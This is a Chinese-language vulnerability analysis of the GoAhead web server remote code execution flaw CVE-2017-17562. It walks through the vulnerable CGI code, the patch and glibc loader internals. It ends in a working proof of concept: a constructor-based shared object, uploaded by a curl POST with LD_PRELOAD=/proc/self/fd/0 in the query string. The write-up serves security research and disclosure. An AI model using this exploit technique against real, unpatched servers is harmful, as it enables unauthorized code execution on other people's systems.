
本文是关于GoAhead web server远程代码执行漏洞(CVE-2017-17562)的分析,该漏洞源于在初始化CGI脚本环境时使用了不受信的HTTP请求参数,会对所有启用了动态链接可执行文件(CGI脚本)的用户造成影响。在此过程中,当CGI脚本调用glibc动态链接器时,特殊变量LD_PRELOAD可被注入滥用,从而导致远程代码执行。该漏洞是个典型的环境变量案例,能推广应用到其它不安全的软件架构漏洞发现中。



在我们进行该项漏洞研究期间,我们发现,该漏洞影响范围涉及GoAhead的早期版本2.5.0和当前最新版本(3.x),几乎是全版本覆盖。可以通过以下方式对存在漏洞的GoAhead程序进行安装编译操作:# Cloning and running the vulnerable GoAhead daemon

daniel@makemyday:~$ git clone https://github.com/embedthis/goahead.git

Cloning into 'goahead'...

remote: Counting objects: 20583, done.

remote: Total 20583 (delta 0), reused 0 (delta 0), pack-reused 20583

Receiving objects: 100% (20583/20583), 19.71 MiB | 4.76 MiB/s, done.

Resolving deltas: 100% (14843/14843), done.

daniel@makemyday:~$ cd goahead/

daniel@makemyday:~/goahead$ ls

configure      CONTRIBUTING.md  doc        installs    main.me   Makefile      paks      README.md  test

configure.bat  dist             farm.json  LICENSE.md  make.bat  package.json  projects  src

daniel@makemyday:~/goahead$ git checkout tags/v3.6.4 -q

daniel@makemyday:~/goahead$ make > /dev/null

daniel@makemyday:~/goahead$ cd test

daniel@makemyday:~/goahead/test$ gcc ./cgitest.c -o cgi-bin/cgitest

daniel@makemyday:~/goahead/test$ sudo ../build/linux-x64-default/bin/goahead



我们可看到在cgiHandler函数中,程序只对REMOTE_HOST和HTTP_AUTHORIZATION进行了过滤,其他变量被误认为可信,并未被采取进一步过滤措施,这就使得允许攻击者可以在新的CGI进程中控制环境变量,非常危险。#  goahead/src/cgi.c:cgihandler


PUBLIC bool cgiHandler(Webs *wp)


Cgi         *cgip;

WebsKey     *s;

char        cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME];

char        *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe;

CgiPid      pHandle;

int         n, envpsize, argpsize, cid;



Add all CGI variables to the environment strings to be passed to the spawned CGI process. This includes a few

we don't already have in the symbol table, plus all those that are in the vars symbol table. envp will point

to a walloc'd array of pointers. Each pointer will point to a walloc'd string containing the keyword value pair

in the form keyword=value. Since we don't know ahead of time how many environment strings there will be the for

loop includes logic to grow the array size via wrealloc.


envpsize = 64;

envp = walloc(envpsize * sizeof(char*));

for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {

if (s->content.valid && s->content.type == string &&

strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&

strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {

envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);

trace(5, "Env[%d] %s", n, envp[n-1]);

if (n >= envpsize) {

envpsize *= 2;

envp = wrealloc(envp, envpsize * sizeof(char *));




*(envp+n) = NULL;


Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin temp file (and name)

should already exist.


if (wp->cgiStdin == NULL) {

wp->cgiStdin = websGetCgiCommName();


stdIn = wp->cgiStdin;

stdOut = websGetCgiCommName();

if (wp->cgifd >= 0) {


wp->cgifd = -1;



Now launch the process.  If not successful, do the cleanup of resources.  If successful, the cleanup will be

done after the process completes.


if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) {



该漏洞可以通过跳过特殊参数名称,而对其它参数添加一个静态字符串前缀来修复,即使对于形式为a = b%00LD_PRELOAD%3D的参数,似乎也能有针对性解决。补丁形式如下:# git diff f9ea55a 6f786c1 src/cgi.c

diff --git a/src/cgi.c b/src/cgi.c

index 899ec97b..18d9b45b 100644

--- a/src/cgi.c

+++ b/src/cgi.c

@@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp)

envpsize = 64;

envp = walloc(envpsize * sizeof(char*));

for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {

-        if (s->content.valid && s->content.type == string &&

-            strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&

-            strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {

-            envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);

+        if (s->content.valid && s->content.type == string) {

+            if (smatch(s->name.value.string, "REMOTE_HOST") ||

+                smatch(s->name.value.string, "HTTP_AUTHORIZATION") ||

+                smatch(s->name.value.string, "IFS") ||

+                smatch(s->name.value.string, "CDPATH") ||

+                smatch(s->name.value.string, "PATH") ||

+                sstarts(s->name.value.string, "LD_")) {

+                continue;

+            }

+            envp[n++] = sfmt("%s%s=%s", ME_GOAHEAD_CGI_PREFIX,

+                s->name.value.string, s->content.value.string);

trace(5, "Env[%d] %s", n, envp[n-1]);

if (n >= envpsize) {

envpsize *= 2;




GoAhead的二进制ELF文件头信息显示,它是一个64位动态链接的可执行文件,解释程序在INTERP段被指定,并且指向动态链接器/lib64/ld-linux-x86-64.so.2。# Reading the ELF header

daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead

ELF Header:

Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00

Class:                             ELF64

Data:                              2's complement, little endian

Version:                           1 (current)

OS/ABI:                            UNIX - System V

ABI Version:                       0

Type:                              DYN (Shared object file)

Machine:                           Advanced Micro Devices X86-64

Version:                           0x1

Entry point address:               0xf80

Start of program headers:          64 (bytes into file)

Start of section headers:          21904 (bytes into file)

Flags:                             0x0

Size of this header:               64 (bytes)

Size of program headers:           56 (bytes)

Number of program headers:         9

Size of section headers:           64 (bytes)

Number of section headers:         34

Section header string table index: 33

Program Headers:

Type           Offset             VirtAddr           PhysAddr

FileSiz            MemSiz              Flags  Align

PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040

0x00000000000001f8 0x00000000000001f8  R E    0x8

INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238

0x000000000000001c 0x000000000000001c  R      0x1

[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]



在动态链接程序执行过程中,动态链接器是首先运行的代码,它负责链接加载共享对象并解析各种符号。为了获得goahead进程加载的所有共享对象列表,我们可以把特殊的环境变量LD_TRACE_LOADED_OBJECTS设置为1,随后,它会显示加载的库信息并退出。如下所示:# ld.so LD_TRACE_LOADED_OBJECTS

daniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead

linux-vdso.so.1 =>  (0x00007fff31bb4000)

libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000)

libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000)

/lib64/ld-linux-x86-64.so.2 (0x00007f571f806000)



# statically finding shared object dependancies

daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED

0x0000000000000001 (NEEDED)             Shared library: [libgo.so]

0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED

0x0000000000000001 (NEEDED)             Shared library: [libpthread.so.0]

0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED

0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]


注意:可能有人注意到这里缺少了linux-vdso.so.1,这没问题,vDSO是由内核映射进用户进程的特殊共享库,详细信息可参考man 7 vdso。


所以这些看似正常,但怎么又和环境变量注入相关呢? 那么...我们知道在新进程中,动态链接器是首先被执行的代码 - 如果我们检查man 8 ld.so后可以发现,一些特殊环境变量的默认操作行为是可以被修改的。我比较喜欢看源码,我们来一挖究竟。其中dl_main函数就是动态链接器的主要入口点,如下# glibc/elf/rtld.c:dl_main

static void

dl_main (const ElfW(Phdr) *phdr,

ElfW(Word) phnum,

ElfW(Addr) *user_entry,

ElfW(auxv_t) *auxv)


const ElfW(Phdr) *ph;

enum mode mode;

struct link_map *main_map;

size_t file_size;

char *file;

bool has_interp = false;

unsigned int i;


/* Process the environment variable which control the behaviour.  */

process_envvars (&mode);

该函数首先执行的任务是调用process_envvars方法:# glibc/elf/rtld.c:process_envvars

static void

process_envvars (enum mode *modep)


char **runp = _environ;

char *envline;

enum mode mode = normal;

char *debug_output = NULL;

/* This is the default place for profiling data file.  */


= &"/var/tmp\0/var/profile"[__libc_enable_secure ? 9 : 0];

while ((envline = _dl_next_ld_env_entry (&runp)) != NULL)


size_t len = 0;

while (envline[len] != '\0' && envline[len] != '=')


if (envline[len] != '=')

/* This is a "LD_" variable at the end of the string without

a '=' character.  Ignore it since otherwise we will access

invalid memory below.  */


switch (len)


case 4:

/* Warning level, verbose or not.  */

if (memcmp (envline, "WARN", 4) == 0)

GLRO(dl_verbose) = envline[5] != '\0';


case 5:

/* Debugging of the dynamic linker?  */

if (memcmp (envline, "DEBUG", 5) == 0)


process_dl_debug (&envline[6]);



if (memcmp (envline, "AUDIT", 5) == 0)

audit_list_string = &envline[6];


case 7:

/* Print information about versions.  */

if (memcmp (envline, "VERBOSE", 7) == 0)


version_info = envline[8] != '\0';



/* List of objects to be preloaded.  */

if (memcmp (envline, "PRELOAD", 7) == 0)


preloadlist = &envline[8];



可以看到,动态链接器会去解析envp数组,如果找到特殊变量名称,则会执行不同的代码路径。非常有意思的是,case 7代码对初始化preloadlist的LD_PRELOAD进程处理机制。

深入分析dl_main可知,如果preloadlist不为NULL,则handle_ld_preload就会被调用,如下:# glibc/elf/rtld.c:dl_main


/* We have two ways to specify objects to preload: via environment

variable and via the file /etc/ld.so.preload.  The latter can also

be used when security is enabled.  */

assert (*first_preload == NULL);

struct link_map **preloads = NULL;

unsigned int npreloads = 0;

if (__glibc_unlikely (preloadlist != NULL))


HP_TIMING_NOW (start);

npreloads += handle_ld_preload (preloadlist, main_map);


HP_TIMING_DIFF (diff, start, stop);

HP_TIMING_ACCUM_NT (load_time, diff);



handle_ld_preload方法会解析preloadlist,并把其值当成要加载的一个共享对象列表:# glibc/elf/rtld.c:handle_ld_preload

/* The list preloaded objects.  */

static const char *preloadlist attribute_relro;

/* Nonzero if information about versions has to be printed.  */

static int version_info attribute_relro;

/* The LD_PRELOAD environment variable gives list of libraries

separated by white space or colons that are loaded before the

executable's dependencies and prepended to the global scope list.

(If the binary is running setuid all elements containing a '/' are

ignored since it is insecure.)  Return the number of preloads

performed.  */

unsigned int

handle_ld_preload (const char *preloadlist, struct link_map *main_map)


unsigned int npreloads = 0;

const char *p = preloadlist;

char fname[SECURE_PATH_LIMIT];

while (*p != '\0')


/* Split preload list at space/colon.  */

size_t len = strcspn (p, " :");

if (len > 0 && len < sizeof (fname))


memcpy (fname, p, len);

fname[len] = '\0';



fname[0] = '\0';

/* Skip over the substring and the following delimiter.  */

p += len;

if (*p != '\0')


if (dso_name_valid_for_suid (fname))

npreloads += do_preload (fname, main_map, "LD_PRELOAD");


return npreloads;




所以,这就非常厉害了,我们能强制加载任意共享对象,但如何能利用它实现代码执行呢?检查.init和.fini段代码后可以发现,如果我们用构造函数属性来包装修饰一个方法函数,那我们就能强制该方法函数在Main方法之前被调用执行。如下PoC:# PoC/payload.c


static void before_main(void) __attribute__((constructor));

static void before_main(void)


write(1, "Hello: World!\n", 14);


将payload.c编译为共享对象:# Compiling payload.c as shared object.

daniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so

daniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null

Hello: World!


好了,如果我们在测试系统上执行该PoC,会产生什么效果呢?如下执行一个简单的PoC:# Trying a simple PoC

daniel@makemyday:~/goahead/PoC$ ls -la ./payload.so

-rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so

daniel@makemyday:~/goahead/PoC$ echo -en "GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\r\n\r\n" | nc localhost 80 | head -10

HTTP/1.0 200 OK

Date: Wed Dec 13 02:38:56 2017

Transfer-Encoding: chunked

Connection: close

X-Frame-Options: SAMEORIGIN

Pragma: no-cache

Cache-Control: no-cache

hello: World!

content-type:  text/html





幸运的是,launchCgi函数实际上使用dup2()将stdin文件描述符指向包含POST请求内容的临时文件,这也就是说,服务器上会有一个包含用户提供的数据文件,并且可以通过LD_PRELOAD=/tmp/cgi-XXXXXX的方式进行引用。# goahead/src/cgi.c:launchCgi


Launch the CGI process and return a handle to it.


static CgiPid launchCgi(char *cgiPath, char **argp, char **envp, char *stdIn, char *stdOut)


int     fdin, fdout, pid;

trace(5, "cgi: run %s", cgiPath);

if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) {

error("Cannot open CGI stdin: ", cgiPath);

return -1;


if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) {

error("Cannot open CGI stdout: ", cgiPath);

return -1;


pid = vfork();

if (pid == 0) {




if (dup2(fdin, 0) < 0) {

printf("content-type: text/html\n\nDup of stdin failed\n");


} else if (dup2(fdout, 1) < 0) {

printf("content-type: text/html\n\nDup of stdout failed\n");


} else if (execve(cgiPath, argp, envp) == -1) {

printf("content-type: text/html\n\nExecution of cgi process failed\n");




不过,这种方式稍显模糊,需要猜测包含POST内容的临时文件,但好在Linux procfs文件系统有一个很好的符号链接,我们可以用它来引用stdin描述符,从而指向我们的临时文件,就比如将 LD_PRELOAD指向/proc/self/fd/0,或使用/dev/stdin来访问临时文件。# linux/fs/proc/self.c

static const char *proc_self_get_link(struct dentry *dentry,

struct inode *inode,

struct delayed_call *done)


struct pid_namespace *ns = inode->i_sb->s_fs_info;

pid_t tgid = task_tgid_nr_ns(current, ns);

char *name;

if (!tgid)

return ERR_PTR(-ENOENT);

/* 11 for max length of signed int in decimal + NULL term */

name = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC);

if (unlikely(!name))

return dentry ? ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD);

sprintf(name, "%d", tgid);

set_delayed_call(done, kfree_link, name);

return name;


static const struct inode_operations proc_self_inode_operations = {

.get_link = proc_self_get_link,


综合分析可知,我们可在POST请求中内置一个包含构造函数的恶意共享对象,当程序加载后,该构造函数会被调用执行。当然,也可以在HTTP参数中内置?LD_PRELOAD=/proc/self/fd/0命令,通过该命令指向包含测试Payload的临时文件,也能实现目的。如下在POST请求中利用命令行实现漏洞利用:# exploiting via the command line

daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

Dload  Upload   Total   Spent    Left  Speed

100  9931    0  2035  100  7896   2035   7896  0:00:01  0:00:01 --:--:--  9774

HTTP/1.1 200 OK

Date: Sun Dec 17 13:08:20 2017

Transfer-Encoding: chunked

Connection: keep-alive

X-Frame-Options: SAMEORIGIN

Pragma: no-cache

Cache-Control: no-cache

hello:  World!

Content-type: text/html





如果你对链接和加载机制感兴趣,可参考这两篇文章(一, 二),感谢阅读。


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